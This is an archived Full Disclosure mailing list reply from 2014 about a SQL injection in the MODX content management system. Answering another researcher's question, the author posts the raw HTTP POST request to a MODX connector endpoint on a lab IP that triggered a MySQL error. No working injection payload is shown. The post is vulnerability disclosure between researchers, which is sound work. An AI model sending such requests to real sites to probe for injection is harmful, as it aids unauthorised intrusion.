Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: SQL injection in MODX
From: Brandon Perry <bperry.volatile () gmail com>
Date: Sun, 9 Mar 2014 09:22:25 -0500

  1 POST /modx/connectors/lang.js.php HTTP/1.1
  2 Host: 192.168.1.70
  3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
  4 Accept: */*
  5 Accept-Language: en-US,en;q=0.5
  6 Accept-Encoding: gzip, deflate
  7 Referer: http://192.168.1.70/modx/manager/
  8 Cookie: PHPSESSID=v2pnqigca0qfr835vimrknh1k0
  9 Connection: keep-alive
 10 Content-Length: 64
 11
 12 ctx=mgr&topic=topmenu,file,resource,welcome,configcheck&action=

Haven't worked on it at all since the initial look through.


On Sun, Mar 9, 2014 at 5:39 AM, Peter W <pwilhelmsen () kryptoslogic com>wrote:

Hello Brandon,

Thank you for some interesting posts on the Full Disclosure mailing lists.

Your analysis of the bug is very interesting and I would like to
investigate this issue further.

Could you show me what kind of requests you made to trigger the MySQL
error?

Thank for you time.

Best regards, Peter




-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Re: SQL injection in MODX Brandon Perry (Mar 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]